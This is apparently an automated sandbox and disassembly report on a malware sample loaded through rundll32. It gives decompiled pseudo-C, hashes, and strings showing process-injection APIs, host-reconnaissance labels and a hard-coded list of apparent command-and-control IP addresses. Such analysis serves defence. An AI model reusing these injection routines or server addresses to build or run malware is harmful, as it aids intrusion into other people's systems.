                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModuleProtectVirtual
                                        • String ID: SleepEx$UD3"$WriteProcessMemory$kernel32.dll
                                        • API String ID: 2492872976-2122506030
                                        • Opcode ID: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction ID: 42b2de8c478d776aa2908350e501d6ebaabfde51f63380f1f59c9cc83b1896e5
                                        • Opcode Fuzzy Hash: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction Fuzzy Hash: 51214776B01A408AEB20DF66E8082DE3BB4F369BD8F454125DE4C17B48DF38C696CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FF2E90(long long __rax, long long __rbx, void* __rcx, signed char* __rdx, long long __rsi, long long __rbp, intOrPtr* __r9, intOrPtr _a8, long long _a16, long long _a24, long long _a32) {
                                        				long long _v32;
                                        				intOrPtr _v40;
                                        				intOrPtr _v56;
                                        				void* _t22;
                                        				void* _t24;
                                        				intOrPtr _t25;
                                        				void* _t27;
                                        				intOrPtr _t28;
                                        				void* _t39;
                                        				long long _t50;
                                        				void* _t73;
                                        
                                        				_t60 = __rdx;
                                        				_t50 = __rax;
                                        				_a16 = __rbx;
                                        				_a24 = __rbp;
                                        				_a32 = __rsi;
                                        				r15d = 0;
                                        				_t73 = __rcx;
                                        				if (__rcx == 0xffffffff) goto 0xf2ff2fc6;
                                        				if (r8b == 0) goto 0xf2ff2f18;
                                        				if (( *__rdx & 0x00000008) == 0) goto 0xf2ff2f18;
                                        				_a8 = r15d;
                                        				_t22 = E0000021E21EF310D880(__rcx, __rdx);
                                        				 *__rdx =  *__rdx | 0x00000008;
                                        				__imp__#112();
                                        				_v56 = 4;
                                        				r8d = 0x80;
                                        				__imp__#21();
                                        				E0000021E21EF310D880(_t73, __rdx);
                                        				__imp__#111();
                                        				if (_t22 != 0) goto 0xf2ff2f18;
                                        				_t24 = E0000021E21EF310D880(_t73, __rdx);
                                        				__imp__#112();
                                        				__imp__#3();
                                        				_t25 = E0000021E21EF310D880(_t73, __rdx);
                                        				__imp__#111();
                                        				_v32 = _t50;
                                        				_v40 = _t25;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				asm("movups [edi], xmm0");
                                        				if (_t24 == 0) goto 0xf2ff2fc6;
                                        				E0000021E21EF310D880(_t73, _t60);
                                        				if ( *((intOrPtr*)(__r9 + 8)) != _t50) goto 0xf2ff2f61;
                                        				if ( *__r9 == 0x2733) goto 0xf2ff2f74;
                                        				_t27 = E0000021E21EF310D880(_t73, _t60);
                                        				if ( *((intOrPtr*)(__r9 + 8)) != _t50) goto 0xf2ff2fc2;
                                        				if ( *__r9 != 0x4d5) goto 0xf2ff2fc2;
                                        				_a8 = r15d;
                                        				__imp__#10();
                                        				 *__rdx =  *__rdx & 0x000000fc;
                                        				__imp__#112();
                                        				__imp__#3();
                                        				_t39 = _t27;
                                        				_t28 = E0000021E21EF310D880(_t73, _t60);
                                        				__imp__#111();
                                        				_v40 = _t28;
                                        				_v32 = _t50;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				asm("movups [edi], xmm0");
                                        				if (_t39 != 0) goto 0xf2ff2fdd;
                                        				_v40 = r15d;
                                        				E0000021E21EF310D880(_t73, _t60);
                                        				_v32 = _t50;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				asm("movups [edi], xmm0");
                                        				return _t39;
                                        			}















                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$closesocket$Init_thread_footerioctlsocketsetsockopt
                                        • String ID:
                                        • API String ID: 3470671040-0
                                        • Opcode ID: 4a7f87fcfa628e80ead2c25a86efed27439d37b1bad46eb5c22b02626f9d8649
                                        • Instruction ID: 3bdb468ae1c8d62f32a4a4c6ca8e1fd7c5b9b793deff24c312e0daf025cdf6e0
                                        • Opcode Fuzzy Hash: 4a7f87fcfa628e80ead2c25a86efed27439d37b1bad46eb5c22b02626f9d8649
                                        • Instruction Fuzzy Hash: 4A41E272624B8182EF505F20FD4929E62E0F7A5760F068215EE8552EE9DF3CC4A6C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitHandleProcessUninitialize
                                        • String ID: 282.19.133.12:443,91.122.18.192:443,185.156.172.62:443,72.123.65.11:443,149.255.35.167:443,172.241.27.146:443$444$Domain name: $User name:
                                        • API String ID: 935808947-1965907867
                                        • Opcode ID: 55953c7f942f71cc36cadd902deb5d5095635cb10c7a61e2f83a196a8b193266
                                        • Instruction ID: b2df30506223c6c2747eab22b42476219f344001664a94f420f357aeac71b492
                                        • Opcode Fuzzy Hash: 55953c7f942f71cc36cadd902deb5d5095635cb10c7a61e2f83a196a8b193266
                                        • Instruction Fuzzy Hash: 79D1BC33221BC689EF21EB64DC483DE23A5E760758F4106169E1A16FDADF78C686C390
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 66%
                                        			E0000021E21EF3003DD0(void* __ebx, void* __ecx, void* __edx, long long __rbx, intOrPtr* __rcx, long long* __rdx, long long __r8) {
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t65;
                                        				void* _t66;
                                        				void* _t67;
                                        				void* _t68;
                                        				long long _t84;
                                        				long long _t93;
                                        				long long* _t98;
                                        				intOrPtr _t101;
                                        				long long _t117;
                                        				void* _t126;
                                        				long long _t129;
                                        				void* _t130;
                                        				long long _t131;
                                        				intOrPtr* _t132;
                                        				intOrPtr _t134;
                                        				void* _t135;
                                        				void* _t137;
                                        				long long* _t142;
                                        				long long _t145;
                                        
                                        				_t65 = __edx;
                                        				_t64 = __ecx;
                                        				_t63 = __ebx;
                                        				 *((long long*)(_t135 + 0x48)) = 0xfffffffe;
                                        				 *((long long*)(_t135 + 0x168)) = __rbx;
                                        				_t131 = __r8;
                                        				_t142 = __rdx;
                                        				_t98 = __rcx;
                                        				_t101 =  *((intOrPtr*)(__rcx + 0x20));
                                        				_t129 =  *((intOrPtr*)(__rcx + 0x10));
                                        				if (__r8 - _t101 - _t129 > 0) goto 0xf3003e20;
                                        				 *((long long*)(__rcx + 0x18)) = _t129 + __r8;
                                        				 *__rdx = _t129;
                                        				 *((long long*)(__rdx + 8)) = __r8;
                                        				goto 0xf3003fea;
                                        				_t130 = _t129 -  *((intOrPtr*)(__rcx + 8));
                                        				if (__r8 - _t101 -  *__rcx - _t130 > 0) goto 0xf3003e5d;
                                        				if (_t130 == 0) goto 0xf3003e45;
                                        				_t137 = _t130;
                                        				E0000021E21EF310DC90(__ecx, _t66, _t67, _t68,  *__rcx,  *((intOrPtr*)(__rcx + 8)), _t130, __r8, _t137);
                                        				_t84 =  *_t98;
                                        				 *((long long*)(_t98 + 8)) = _t84;
                                        				 *((long long*)(_t98 + 0x18)) = _t84 + _t130 + __r8;
                                        				goto 0xf3003fdf;
                                        				_t132 = _t98 + 0x28;
                                        				if (__r8 -  *_t132 - _t130 <= 0) goto 0xf3003f22;
                                        				 *((long long*)(_t135 + 0x20)) = 0xf319d200;
                                        				 *((long long*)(_t135 + 0x28)) = 0xf319d200;
                                        				 *((long long*)(_t135 + 0x30)) = 0xf319d200;
                                        				 *((long long*)(_t135 + 0x38)) = "basic_flat_buffer overflow";
                                        				 *((char*)(_t135 + 0x40)) = 1;
                                        				E0000021E21EF310E0E4(_t98, _t135 + 0x38, _t135 + 0x28, _t130, __r8);
                                        				 *((long long*)(_t135 + 0x20)) = 0xf319d240;
                                        				 *((long long*)(_t135 + 0x20)) = 0xf319d270;
                                        				E0000021E21EF2FFE350(_t98, _t135 + 0xa8, _t135 + 0x20);
                                        				 *0x21EF319D298 = "class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)";
                                        				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/flat_buffer.ipp";
                                        				 *0x21EF319D2A8 = 0x105;
                                        				E0000021E21EF30012E0(0xf319d270, _t135 + 0xe8);
                                        				E0000021E21EF3001320(_t63, _t98, _t135 + 0x50, 0xf319d270, _t131);
                                        				E0000021E21EF31103EC(_t98, _t135 + 0x50, 0xf31e4b98, _t131);
                                        				 *((long long*)(_t135 + 0x160)) = _t130 + _t137;
                                        				 *((long long*)(_t135 + 0x170)) = _t130 + _t130;
                                        				_t126 =  >=  ? _t135 + 0x170 : _t135 + 0x160;
                                        				_t93 =  *_t132;
                                        				_t133 =  <  ? _t126 : _t132;
                                        				_t134 =  *((intOrPtr*)( <  ? _t126 : _t132));
                                        				if (_t134 != 0) goto 0xf3003f6a;
                                        				r15d = 0;
                                        				goto 0xf3003fa0;
                                        				if (_t134 - 0x1000 < 0) goto 0xf3003f95;
                                        				if (_t134 + 0x27 - _t134 > 0) goto 0xf3003f82;
                                        				E0000021E21EF310A170(_t93);
                                        				asm("int3");
                                        				E0000021E21EF310B674(_t93, _t134 + 0x27);
                                        				_t38 = _t93 + 0x27; // 0x27
                                        				 *((long long*)((_t38 & 0xffffffe0) - 8)) = _t93;
                                        				goto 0xf3003fa0;
                                        				E0000021E21EF310B674(_t93, _t134);
                                        				_t145 = _t93;
                                        				if ( *_t98 == 0) goto 0xf3003fc4;
                                        				E0000021E21EF310DC90(_t64, _t66, _t67, _t68, _t145,  *((intOrPtr*)(_t98 + 8)), _t130, _t131, _t130);
                                        				_t62 = E0000021E21EF2FE83F0(_t64, _t65, _t98,  *_t98,  *((intOrPtr*)(_t98 + 0x20)) -  *_t98);
                                        				 *_t98 = _t145;
                                        				 *((long long*)(_t98 + 8)) = _t145;
                                        				_t117 = _t145 + _t130;
                                        				 *((long long*)(_t98 + 0x18)) = _t117 + _t131;
                                        				 *((long long*)(_t98 + 0x20)) = _t145 + _t134;
                                        				 *((long long*)(_t142 + 8)) = _t131;
                                        				 *_t142 = _t117;
                                        				 *((long long*)(_t98 + 0x10)) = _t117;
                                        				return _t62;
                                        			}



























                                        Strings
                                        • class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64), xrefs: 0000021EF3003ED5
                                        • basic_flat_buffer overflow, xrefs: 0000021EF3003E89
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp, xrefs: 0000021EF3003EE0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp$basic_flat_buffer overflow$class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)
                                        • API String ID: 0-1740500164
                                        • Opcode ID: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction ID: fc3c3b095ffa1014dbf36041c99d235771c92b855baabd84b66a8f68c11e65f6
                                        • Opcode Fuzzy Hash: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction Fuzzy Hash: 44516E72201F8095DF21DF24E9483DA73B5F798B94F5282269E9D07B98EF38C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TimerWaitable$CloseCreateCriticalEnterErrorExceptionHandleInit_thread_footerLastSectionThrow__std_exception_copy
                                        • String ID: timer
                                        • API String ID: 1177437407-1792073242
                                        • Opcode ID: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction ID: 4e0f079183c22e9f61eda46c18e45ed979c4fec301ddac453d8dc39db687f3ed
                                        • Opcode Fuzzy Hash: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction Fuzzy Hash: A7316E32210F8085EB649F15E8483DA73B4F7A5B90F558229DE9A47F99EF38C166C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Certificate$ContextPropertyStore$CertificatesEnumFind
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 1407214842-2690582526
                                        • Opcode ID: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction ID: 280270f932ae7d4650d05f91caa21a29117da7a8128a88f00bcaaf23383ae975
                                        • Opcode Fuzzy Hash: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction Fuzzy Hash: 8D41C13134174086EE60DB62EC087EBA7E1ABA6BD4F468026DD4943F95EE3CD507CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 66%
                                        			E0000021E21EF3018F94(intOrPtr __rax, void* __rcx, char _a8, char _a16, void* _a24) {
                                        				long long _v48;
                                        				long long _v56;
                                        				char _v64;
                                        				long long _v72;
                                        				void* __rbx;
                                        				void* __rsi;
                                        				void* _t29;
                                        				intOrPtr _t51;
                                        				intOrPtr _t52;
                                        				long long _t53;
                                        				intOrPtr* _t60;
                                        				intOrPtr _t65;
                                        				intOrPtr _t74;
                                        				signed long long _t75;
                                        				long long _t76;
                                        				void* _t81;
                                        
                                        				_t51 = __rax;
                                        				_v72 = 0xfffffffe;
                                        				_t81 = __rcx;
                                        				E0000021E21EF310A29C(0,  &_a16);
                                        				_t76 =  *0xf320b608;
                                        				_a24 = _t76;
                                        				_t74 =  *0xf3209c28;
                                        				if (_t74 != 0) goto 0xf301900b;
                                        				E0000021E21EF310A29C(0,  &_a8);
                                        				if ( *0xf3209c28 != _t74) goto 0xf3018ffb;
                                        				 *0xf3209c08 =  *0xf3209c08 + 1;
                                        				 *0xf3209c28 = _t51;
                                        				_t29 = E0000021E21EF310A31C(_t51,  &_a8);
                                        				_t75 =  *0xf3209c28;
                                        				_t65 =  *((intOrPtr*)(_t81 + 8));
                                        				if (_t75 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0xf301901f;
                                        				_t52 =  *((intOrPtr*)(_t65 + 0x10));
                                        				goto 0xf3019021;
                                        				if ( *((intOrPtr*)(_t52 + _t75 * 8)) != 0) goto 0xf30190b1;
                                        				if ( *((intOrPtr*)(_t65 + 0x24)) == 0) goto 0xf3019046;
                                        				E0000021E21EF310A4F8(_t29);
                                        				if (_t75 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xf3019044;
                                        				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                                        				goto 0xf3019046;
                                        				if ( *((intOrPtr*)(_t53 + _t75 * 8)) != 0) goto 0xf30190b1;
                                        				if (_t76 == 0) goto 0xf3019055;
                                        				goto 0xf30190b1;
                                        				E0000021E21EF30182C8(_t76,  &_a24, _t81, _t76);
                                        				if (_t53 != 0xffffffff) goto 0xf3019094;
                                        				_v48 = _t53;
                                        				_v56 = "bad cast";
                                        				_v64 = 0xf319e1e0;
                                        				E0000021E21EF31103EC(_t76,  &_v64, 0xf31e50b0, _t76);
                                        				asm("int3");
                                        				_t60 = _a24;
                                        				 *0xf320b608 = _t60;
                                        				 *((intOrPtr*)( *_t60 + 8))();
                                        				return E0000021E21EF310A31C(E0000021E21EF310A4C0(0xf319e1e0, _t60),  &_a16);
                                        			}



















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                                        • String ID: bad cast
                                        • API String ID: 1824299764-3145022300
                                        • Opcode ID: b889a62ffff14c02cd46d74b7cb6db2d42dad7982d218e207c9a0e33b4fef1b8
                                        • Instruction ID: 0b05e30e919b9f55d9908cfd8ba76cd6a35b34fc7866e9bbffb9030182f527dc
                                        • Opcode Fuzzy Hash: b889a62ffff14c02cd46d74b7cb6db2d42dad7982d218e207c9a0e33b4fef1b8
                                        • Instruction Fuzzy Hash: 4F314676601A40C9FF51DB25DC482DA23B1F7A4BA4F164222DE1A47BE5DE3CC887C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 25%
                                        			E0000021E21EF2FE7560(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, signed char** __r9, long long _a8, long long _a16, long long _a24) {
                                        				void* _v8;
                                        				signed int _v272;
                                        				intOrPtr _v292;
                                        				long long _v304;
                                        				char _v312;
                                        				void* __rdi;
                                        				signed int _t21;
                                        				void* _t29;
                                        				void* _t32;
                                        				void* _t33;
                                        				signed char** _t42;
                                        				void* _t63;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_t63 = __rcx;
                                        				r8d = 0x128;
                                        				_t42 = __r9;
                                        				E0000021E21EF310E410(_t29, 0, _t32, _t33,  &_v312, __rdx, __r8, __r8);
                                        				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xf2fe75a1;
                                        				goto 0xf2fe75a4;
                                        				_v304 = __r8;
                                        				_v292 =  *((intOrPtr*)(__r8 + 0x10));
                                        				if (_t42[2] == 0) goto 0xf2fe75e1;
                                        				if (_t42[3] - 0x10 < 0) goto 0xf2fe75c1;
                                        				asm("o16 nop [eax+eax]");
                                        				_t21 =  *( *_t42) & 0x000000ff;
                                        				_v272 = _t21;
                                        				if (_t21 != 0) goto 0xf2fe75d0;
                                        				GetModuleHandleW(??);
                                        				GetProcAddress(??, ??);
                                        				GetProcAddress(??, ??);
                                        				 *((long long*)(__r8))();
                                        				 *((long long*)(__r8))();
                                        				if (_t63 == 0) goto 0xf2fe763b;
                                        				0xf301ad6c();
                                        				CloseHandle(??);
                                        				return 1;
                                        			}















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleProc$CloseModule
                                        • String ID: NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 133214361-1717905385
                                        • Opcode ID: 06830f6ba741785775f7a10f9e8eb4e99d0738ace87f75eb99c8e9bc4c215570
                                        • Instruction ID: f91c01fb4ab74b810d0b3709efb8bb49f892bdae70edd8f4e8015ac30327082c
                                        • Opcode Fuzzy Hash: 06830f6ba741785775f7a10f9e8eb4e99d0738ace87f75eb99c8e9bc4c215570
                                        • Instruction Fuzzy Hash: 42215A72214B4181EF01DB12E8483DA67B0F7A9FC4F4A8062DE5987B59DF39C597C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0000021E21EF301B9B0(long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, char _a32) {
                                        				void* _v24;
                                        				char _v40;
                                        				intOrPtr _v48;
                                        				signed int _v56;
                                        				intOrPtr _v64;
                                        				long long _v72;
                                        				long long _v80;
                                        				signed long long _v88;
                                        				struct HINSTANCE__* _t45;
                                        				struct HINSTANCE__* _t48;
                                        				void* _t54;
                                        				void* _t59;
                                        				WCHAR* _t61;
                                        
                                        				_t59 = _t54;
                                        				 *((long long*)(_t59 + 8)) = __rbx;
                                        				 *((long long*)(_t59 + 0x10)) = __rbp;
                                        				 *(_t59 - 0x28) =  *(_t59 - 0x28) & 0x00000000;
                                        				 *(_t59 + 0x20) =  *(_t59 + 0x20) & 0x00000000;
                                        				 *((intOrPtr*)(_t59 + 0x24)) = 0;
                                        				GetModuleHandleW(_t61);
                                        				GetProcAddress(_t45);
                                        				GetProcAddress(_t48);
                                        				_v48 = 0x40;
                                        				r9d = 0;
                                        				_v56 = _v56 & 0x00000000;
                                        				_v64 = 2;
                                        				_v72 =  &_v40;
                                        				_v80 =  &_a32;
                                        				_v88 = _v88 & 0x00000000;
                                        				 *__rax();
                                        				return  *__rax();
                                        			}
















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: @$NtMapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-1608534789
                                        • Opcode ID: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction ID: e5b53ac62abf743907423c7d508b40ad1515387d47b3ce003b8afa6ac5360021
                                        • Opcode Fuzzy Hash: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction Fuzzy Hash: DB114632214B408AEB109B12F848B9A77E4F39DBA5F568135DE4D83B14EF7DC58ACB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 38%
                                        			E0000021E21EF2FEF950(intOrPtr __edx, void* __ebp, void* __eflags, long long __rbx, long long __rcx, void* __r8, void* __r9) {
                                        				void* __rsi;
                                        				void* __rbp;
                                        				signed int _t85;
                                        				struct _CRITICAL_SECTION* _t117;
                                        				struct _CRITICAL_SECTION* _t142;
                                        				struct _CRITICAL_SECTION* _t147;
                                        				intOrPtr* _t150;
                                        				intOrPtr* _t152;
                                        				struct _CRITICAL_SECTION** _t156;
                                        				intOrPtr _t160;
                                        				struct _CRITICAL_SECTION* _t178;
                                        				struct _CRITICAL_SECTION* _t183;
                                        				long long _t184;
                                        				long _t186;
                                        				void* _t189;
                                        				void* _t190;
                                        				void* _t192;
                                        				void* _t193;
                                        				long _t201;
                                        				LARGE_INTEGER* _t204;
                                        				void* _t206;
                                        				struct _CRITICAL_SECTION* _t208;
                                        
                                        				 *((intOrPtr*)(_t192 + 0x10)) = __edx;
                                        				_t190 = _t192 - 0x27;
                                        				_t193 = _t192 - 0xa0;
                                        				 *((long long*)(_t190 - 0x41)) = 0xfffffffe;
                                        				 *((long long*)(_t193 + 0xf0)) = __rbx;
                                        				_t184 = __rcx;
                                        				r13d = 0;
                                        				r15d = 1;
                                        				asm("o16 nop [eax+eax]");
                                        				asm("lock inc esp");
                                        				if (__eflags != 0) goto 0xf2fefae7;
                                        				_t5 = _t184 + 0x60; // 0x61
                                        				 *((long long*)(_t190 + 0x17)) = _t5;
                                        				EnterCriticalSection(_t208);
                                        				 *((char*)(_t190 + 0x1f)) = 1;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [ebp-0x31], xmm0");
                                        				_t142 =  *(__rcx + 0x90);
                                        				if (_t142 == 0) goto 0xf2fef9f4;
                                        				_t160 =  *((intOrPtr*)(_t190 - 0x29));
                                        				if (_t160 == 0) goto 0xf2fef9d7;
                                        				 *(_t160 + 0x20) = _t142;
                                        				goto 0xf2fef9db;
                                        				 *(_t190 - 0x31) = _t142;
                                        				 *((long long*)(_t190 - 0x29)) =  *(__rcx + 0x98);
                                        				 *(__rcx + 0x90) = _t204;
                                        				 *(__rcx + 0x98) = _t204;
                                        				_t150 =  *((intOrPtr*)(__rcx + 0x88));
                                        				if (_t150 == 0) goto 0xf2fefa16;
                                        				 *((intOrPtr*)( *_t150 + 0x20))();
                                        				if ( *((intOrPtr*)(_t150 + 8)) != 0) goto 0xf2fefa00;
                                        				E0000021E21EF2FEF840( *((intOrPtr*)(_t150 + 8)), __rcx, _t190 - 0x31, _t5, _t190);
                                        				if ( *((long long*)(_t184 + 0x48)) == 0) goto 0xf2fefa8f;
                                        				_t152 =  *((intOrPtr*)(_t184 + 0x88));
                                        				if (_t152 == 0) goto 0xf2fefa8f;
                                        				asm("o16 nop [eax+eax]");
                                        				_t85 =  *((intOrPtr*)( *_t152 + 0x18))();
                                        				if ( *((intOrPtr*)(_t152 + 8)) != 0) goto 0xf2fefa40;
                                        				if (_t85 - 0x11e1a300 >= 0) goto 0xf2fefa8f;
                                        				 *((long long*)(_t190 - 0x49)) =  ~_t85 +  ~_t85 * 4 +  ~_t85 +  ~_t85 * 4;
                                        				 *(_t193 + 0x28) = r13d;
                                        				 *(_t193 + 0x20) = _t204;
                                        				r9d = 0;
                                        				r8d = 0x493e0;
                                        				SetWaitableTimer(_t206, _t204, _t201);
                                        				_t178 =  *(_t190 - 0x31);
                                        				if (_t178 == 0) goto 0xf2fefade;
                                        				_t147 =  *(_t178 + 0x20);
                                        				 *(_t190 - 0x31) = _t147;
                                        				_t168 =  ==  ? _t204 :  *((intOrPtr*)(_t190 - 0x29));
                                        				 *((long long*)(_t190 - 0x29)) =  ==  ? _t204 :  *((intOrPtr*)(_t190 - 0x29));
                                        				 *(_t178 + 0x20) = _t204;
                                        				 *(_t190 - 9) = r13d;
                                        				E0000021E21EF310D880( ==  ? _t204 :  *((intOrPtr*)(_t190 - 0x29)), _t178);
                                        				 *(_t190 - 1) = _t147;
                                        				r9d = 0;
                                        				 *((intOrPtr*)(_t178 + 0x28))();
                                        				if ( *(_t190 - 0x31) != 0) goto 0xf2fefa9b;
                                        				LeaveCriticalSection(_t183);
                                        				 *(_t190 + 0x6f) = r13d;
                                        				 *(_t190 + 0x67) = _t204;
                                        				 *(_t190 + 0x7f) = _t204;
                                        				SetLastError(_t186);
                                        				 *(_t193 + 0x20) =  *(_t184 + 0x40);
                                        				r14d = GetQueuedCompletionStatus(_t189, ??, ??, ??);
                                        				_t117 = GetLastError();
                                        				_t156 =  *(_t190 + 0x7f);
                                        				if (_t156 == 0) goto 0xf2fefb7e;
                                        				E0000021E21EF310D880( *((intOrPtr*)(_t184 + 0x28)), _t190 + 0x6f);
                                        				 *(_t190 - 0x19) = _t117;
                                        				 *(_t190 - 0x11) = _t147;
                                        				if ( *(_t190 + 0x67) != 2) goto 0xf2fefb5d;
                                        				 *(_t190 + 7) = _t156[4];
                                        				 *(_t190 + 0xf) =  *_t156;
                                        				asm("movaps xmm0, [ebp+0x7]");
                                        				asm("movdqa [ebp-0x19], xmm0");
                                        				 *(_t190 + 0x6f) = _t156[5];
                                        				goto 0xf2fefb6c;
                                        				 *_t156 = _t147;
                                        				_t156[4] =  *(_t190 - 0x19);
                                        				_t156[5] =  *(_t190 + 0x6f);
                                        				asm("lock inc esp");
                                        				if (0 == 1) goto 0xf2fefbb2;
                                        				goto 0xf2fef990;
                                        				if (r14d != 0) goto 0xf2fefb90;
                                        				if (_t117 != 0x102) goto 0xf2fefbf7;
                                        				goto 0xf2fef990;
                                        				if ( *(_t190 + 0x67) == 1) goto 0xf2fef990;
                                        				 *(_t184 + 0x38) = r13d;
                                        				asm("lock xadd [edi+0x34], eax");
                                        				if (r13d != 0) goto 0xf2fefbfc;
                                        				goto 0xf2fef990;
                                        				 *((long long*)(_t190 - 0x39)) = _t184;
                                        				r9d =  *(_t190 + 0x6f);
                                        				_t156[0xa]();
                                        				 *(_t190 + 7) = r13d;
                                        				E0000021E21EF310D880(_t184, _t156);
                                        				 *(_t190 + 0xf) = _t147;
                                        				asm("movups xmm0, [ebp+0x7]");
                                        				asm("inc ecx");
                                        				asm("lock xadd [edi+0x30], ecx");
                                        				if (0xffffffff != 1) goto 0xf2fefbf2;
                                        				E0000021E21EF2FEF7D0(_t147, _t156, _t184);
                                        				goto 0xf2fefc3e;
                                        				 *(_t190 + 7) = _t117;
                                        				goto 0xf2fefc2a;
                                        				_t75 = _t184 + 0x38;
                                        				r15d =  *_t75;
                                        				 *_t75 = r15d;
